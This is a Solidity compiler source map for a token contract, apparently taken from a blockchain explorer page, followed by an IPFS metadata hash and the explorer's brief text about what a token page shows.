;38402:373;:::o;41498:115::-;24717:19;:17;:19::i;:::-;41590:15:::1;41602:2;-1:-1:-1::0;;;;;37979:16:0;;37975:74;;38019:18;;-1:-1:-1;;;38019:18:0;;;;;;;;;;;37975:74;38086:6;:8;;;;;;;;:6;38154:12;;;:8;:12;;;;;;-1:-1:-1;;;;;38154:12:0;:26;38150:81;;38204:15;;-1:-1:-1;;;38204:15:0;;;;;;;;;;;38150:81;38243:12;;;;:8;:12;;;;;;;;:17;;-1:-1:-1;;;;;;38243:17:0;-1:-1:-1;;;;;38243:17:0;;;;;;;;38271:10;;;:6;:10;;;;;:19;;-1:-1:-1;38271:19:0;;;;;;;;;;;;;;;38319:10;;:17;;:21;;-1:-1:-1;38319:21:0;:::i;:::-;38301:15;;;;:11;:15;;;;;;:39;;;;38358:28;;38313:2;;-1:-1:-1;;;;;38358:28:0;;;;;38301:15;;38358:28;37964:430;37920:474;:::o;14:250:1:-;99:1;109:113;123:6;120:1;117:13;109:113;;;199:11;;;193:18;180:11;;;173:39;145:2;138:10;109:113;;;-1:-1:-1;;256:1:1;238:16;;231:27;14:250::o;269:396::-;418:2;407:9;400:21;381:4;450:6;444:13;493:6;488:2;477:9;473:18;466:34;509:79;581:6;576:2;565:9;561:18;556:2;548:6;544:15;509:79;:::i;:::-;649:2;628:15;-1:-1:-1;;624:29:1;609:45;;;;656:2;605:54;;269:396;-1:-1:-1;;269:396:1:o;670:180::-;729:6;782:2;770:9;761:7;757:23;753:32;750:52;;;798:1;795;788:12;750:52;-1:-1:-1;821:23:1;;670:180;-1:-1:-1;670:180:1:o;1063:173::-;1131:20;;-1:-1:-1;;;;;1180:31:1;;1170:42;;1160:70;;1226:1;1223;1216:12;1241:254;1309:6;1317;1370:2;1358:9;1349:7;1345:23;1341:32;1338:52;;;1386:1;1383;1376:12;1338:52;1409:29;1428:9;1409:29;:::i;:::-;1399:39;1485:2;1470:18;;;;1457:32;;-1:-1:-1;;;1241:254:1:o;1874:328::-;1951:6;1959;1967;2020:2;2008:9;1999:7;1995:23;1991:32;1988:52;;;2036:1;2033;2026:12;1988:52;2059:29;2078:9;2059:29;:::i;:::-;2049:39;;2107:38;2141:2;2130:9;2126:18;2107:38;:::i;:::-;2097:48;;2192:2;2181:9;2177:18;2164:32;2154:42;;1874:328;;;;;:::o;2396:347::-;2461:6;2469;2522:2;2510:9;2501:7;2497:23;2493:32;2490:52;;;2538:1;2535;2528:12;2490:52;2561:29;2580:9;2561:29;:::i;:::-;2551:39;;2640:2;2629:9;2625:18;2612:32;2687:5;2680:13;2673:21;2666:5;2663:32;2653:60;;2709:1;2706;2699:12;2653:60;2732:5;2722:15;;;2396:347;;;;;:::o;2748:186::-;2807:6;2860:2;2848:9;2839:7;2835:23;2831:32;2828:52;;;2876:1;2873;2866:12;2828:52;2899:29;2918:9;2899:29;:::i;2939:808::-;3036:6;3044;3052;3060;3068;3121:3;3109:9;3100:7;3096:23;3092:33;3089:53;;;3138:1;3135;3128:12;3089:53;3161:29;3180:9;3161:29;:::i;:::-;3151:39;;3209:38;3243:2;3232:9;3228:18;3209:38;:::i;:::-;3199:48;;3294:2;3283:9;3279:18;3266:32;3256:42;;3349:2;3338:9;3334:18;3321:32;3372:18;3413:2;3405:6;3402:14;3399:34;;;3429:1;3426;3419:12;3399:34;3467:6;3456:9;3452:22;3442:32;;3512:7;3505:4;3501:2;3497:13;3493:27;3483:55;;3534:1;3531;3524:12;3483:55;3574:2;3561:16;3600:2;3592:6;3589:14;3586:34;;;3616:1;3613;3606:12;3586:34;3661:7;3656:2;3647:6;3643:2;3639:15;3635:24;3632:37;3629:57;;;3682:1;3679;3672:12;3629:57;2939:808;;;;-1:-1:-1;2939:808:1;;-1:-1:-1;3713:2:1;3705:11;;3735:6;2939:808;-1:-1:-1;;;2939:808:1:o;3752:260::-;3820:6;3828;3881:2;3869:9;3860:7;3856:23;3852:32;3849:52;;;3897:1;3894;3887:12;3849:52;3920:29;3939:9;3920:29;:::i;:::-;3910:39;;3968:38;4002:2;3991:9;3987:18;3968:38;:::i;:::-;3958:48;;3752:260;;;;;:::o;4017:127::-;4078:10;4073:3;4069:20;4066:1;4059:31;4109:4;4106:1;4099:15;4133:4;4130:1;4123:15;4149:922;4218:6;4271:2;4259:9;4250:7;4246:23;4242:32;4239:52;;;4287:1;4284;4277:12;4239:52;4327:9;4314:23;4356:18;4397:2;4389:6;4386:14;4383:34;;;4413:1;4410;4403:12;4383:34;4451:6;4440:9;4436:22;4426:32;;4496:7;4489:4;4485:2;4481:13;4477:27;4467:55;;4518:1;4515;4508:12;4467:55;4554:2;4541:16;4576:2;4572;4569:10;4566:36;;;4582:18;;:::i;:::-;4657:2;4651:9;4625:2;4711:13;;-1:-1:-1;;4707:22:1;;;4731:2;4703:31;4699:40;4687:53;;;4755:18;;;4775:22;;;4752:46;4749:72;;;4801:18;;:::i;:::-;4841:10;4837:2;4830:22;4876:2;4868:6;4861:18;4916:7;4911:2;4906;4902;4898:11;4894:20;4891:33;4888:53;;;4937:1;4934;4927:12;4888:53;4993:2;4988;4984;4980:11;4975:2;4967:6;4963:15;4950:46;5038:1;5016:15;;;5033:2;5012:24;5005:35;;;;-1:-1:-1;5020:6:1;4149:922;-1:-1:-1;;;;;4149:922:1:o;5076:380::-;5155:1;5151:12;;;;5198;;;5219:61;;5273:4;5265:6;5261:17;5251:27;;5219:61;5326:2;5318:6;5315:14;5295:18;5292:38;5289:161;;5372:10;5367:3;5363:20;5360:1;5353:31;5407:4;5404:1;5397:15;5435:4;5432:1;5425:15;5289:161;;5076:380;;;:::o;5461:127::-;5522:10;5517:3;5513:20;5510:1;5503:31;5553:4;5550:1;5543:15;5577:4;5574:1;5567:15;5593:128;5660:9;;;5681:11;;;5678:37;;;5695:18;;:::i;5726:127::-;5787:10;5782:3;5778:20;5775:1;5768:31;5818:4;5815:1;5808:15;5842:4;5839:1;5832:15;5858:127;5919:10;5914:3;5910:20;5907:1;5900:31;5950:4;5947:1;5940:15;5974:4;5971:1;5964:15;6550:290;6619:6;6672:2;6660:9;6651:7;6647:23;6643:32;6640:52;;;6688:1;6685;6678:12;6640:52;6714:16;;-1:-1:-1;;;;;;6759:32:1;;6749:43;;6739:71;;6806:1;6803;6796:12;6845:168;6918:9;;;6949;;6966:15;;;6960:22;;6946:37;6936:71;;6987:18;;:::i;7018:662::-;-1:-1:-1;;;;;7297:15:1;;;7279:34;;7349:15;;7344:2;7329:18;;7322:43;7396:2;7381:18;;7374:34;;;7444:3;7439:2;7424:18;;7417:31;;;7464:19;;7457:35;;;7222:4;7485:6;7535;7259:3;7514:19;;7501:49;7600:1;7594:3;7585:6;7574:9;7570:22;7566:32;7559:43;7670:3;7663:2;7659:7;7654:2;7646:6;7642:15;7638:29;7627:9;7623:45;7619:55;7611:63;;7018:662;;;;;;;;:::o;7811:1121::-;8088:3;8117:1;8150:6;8144:13;8180:36;8206:9;8180:36;:::i;:::-;8235:1;8252:18;;;8279:133;;;;8426:1;8421:356;;;;8245:532;;8279:133;-1:-1:-1;;8312:24:1;;8300:37;;8385:14;;8378:22;8366:35;;8357:45;;;-1:-1:-1;8279:133:1;;8421:356;8452:6;8449:1;8442:17;8482:4;8527:2;8524:1;8514:16;8552:1;8566:165;8580:6;8577:1;8574:13;8566:165;;;8658:14;;8645:11;;;8638:35;8701:16;;;;8595:10;;8566:165;;;8570:3;;;8760:6;8755:3;8751:16;8744:23;;8245:532;;;;;8808:6;8802:13;8824:68;8883:8;8878:3;8871:4;8863:6;8859:17;8824:68;:::i;:::-;8908:18;;7811:1121;-1:-1:-1;;;;7811:1121:1:o;8937:545::-;9039:2;9034:3;9031:11;9028:448;;;9075:1;9100:5;9096:2;9089:17;9145:4;9141:2;9131:19;9215:2;9203:10;9199:19;9196:1;9192:27;9186:4;9182:38;9251:4;9239:10;9236:20;9233:47;;;-1:-1:-1;9274:4:1;9233:47;9329:2;9324:3;9320:12;9317:1;9313:20;9307:4;9303:31;9293:41;;9384:82;9402:2;9395:5;9392:13;9384:82;;;9447:17;;;9428:1;9417:13;9384:82;;;9388:3;;;8937:545;;;:::o;9658:1352::-;9784:3;9778:10;9811:18;9803:6;9800:30;9797:56;;;9833:18;;:::i;:::-;9862:97;9952:6;9912:38;9944:4;9938:11;9912:38;:::i;:::-;9906:4;9862:97;:::i;:::-;10014:4;;10078:2;10067:14;;10095:1;10090:663;;;;10797:1;10814:6;10811:89;;;-1:-1:-1;10866:19:1;;;10860:26;10811:89;-1:-1:-1;;9615:1:1;9611:11;;;9607:24;9603:29;9593:40;9639:1;9635:11;;;9590:57;10913:81;;10060:944;;10090:663;7758:1;7751:14;;;7795:4;7782:18;;-1:-1:-1;;10126:20:1;;;10244:236;10258:7;10255:1;10252:14;10244:236;;;10347:19;;;10341:26;10326:42;;10439:27;;;;10407:1;10395:14;;;;10274:19;;10244:236;;;10248:3;10508:6;10499:7;10496:19;10493:201;;;10569:19;;;10563:26;-1:-1:-1;;10652:1:1;10648:14;;;10664:3;10644:24;10640:37;10636:42;10621:58;10606:74;;10493:201;-1:-1:-1;;;;;10740:1:1;10724:14;;;10720:22;10707:36;;-1:-1:-1;9658:1352:1:o;11015:422::-;11104:1;11147:5;11104:1;11161:270;11182:7;11172:8;11169:21;11161:270;;;11241:4;11237:1;11233:6;11229:17;11223:4;11220:27;11217:53;;;11250:18;;:::i;:::-;11300:7;11290:8;11286:22;11283:55;;;11320:16;;;;11283:55;11399:22;;;;11359:15;;;;11161:270;;;11165:3;11015:422;;;;;:::o;11442:806::-;11491:5;11521:8;11511:80;;-1:-1:-1;11562:1:1;11576:5;;11511:80;11610:4;11600:76;;-1:-1:-1;11647:1:1;11661:5;;11600:76;11692:4;11710:1;11705:59;;;;11778:1;11773:130;;;;11685:218;;11705:59;11735:1;11726:10;;11749:5;;;11773:130;11810:3;11800:8;11797:17;11794:43;;;11817:18;;:::i;:::-;-1:-1:-1;;11873:1:1;11859:16;;11888:5;;11685:218;;11987:2;11977:8;11974:16;11968:3;11962:4;11959:13;11955:36;11949:2;11939:8;11936:16;11931:2;11925:4;11922:12;11918:35;11915:77;11912:159;;;-1:-1:-1;12024:19:1;;;12056:5;;11912:159;12103:34;12128:8;12122:4;12103:34;:::i;:::-;12173:6;12169:1;12165:6;12161:19;12152:7;12149:32;12146:58;;;12184:18;;:::i;:::-;12222:20;;11442:806;-1:-1:-1;;;11442:806:1:o;12253:140::-;12311:5;12340:47;12381:4;12371:8;12367:19;12361:4;12340:47;:::i;12398:125::-;12463:9;;;12484:10;;;12481:36;;;12497:18;;:::i;13371:217::-;13411:1;13437;13427:132;;13481:10;13476:3;13472:20;13469:1;13462:31;13516:4;13513:1;13506:15;13544:4;13541:1;13534:15;13427:132;-1:-1:-1;13573:9:1;;13371:217::o;13593:135::-;13632:3;13653:17;;;13650:43;;13673:18;;:::i;:::-;-1:-1:-1;13720:1:1;13709:13;;13593:135::o

Swarm Source

ipfs://4c1b7d309da6fec7557c70abd6ddaee42a61abca15558dd34294681171e3405f
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.